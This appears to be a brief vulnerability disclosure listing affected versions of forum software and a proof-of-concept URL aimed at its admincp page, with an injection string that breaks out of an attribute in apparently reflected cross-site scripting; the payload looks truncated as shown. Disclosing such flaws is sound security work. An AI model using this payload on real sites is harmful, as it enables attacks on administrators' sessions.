Vulnerable versions: 4.1.3pl3, 4.1.4pl3 & 4.1.5pl1

PoC:

[cc lang=”html”]http://www.example.com/forums/admincp/?”;>[/cc]

Happy educational purpose testing! 🙂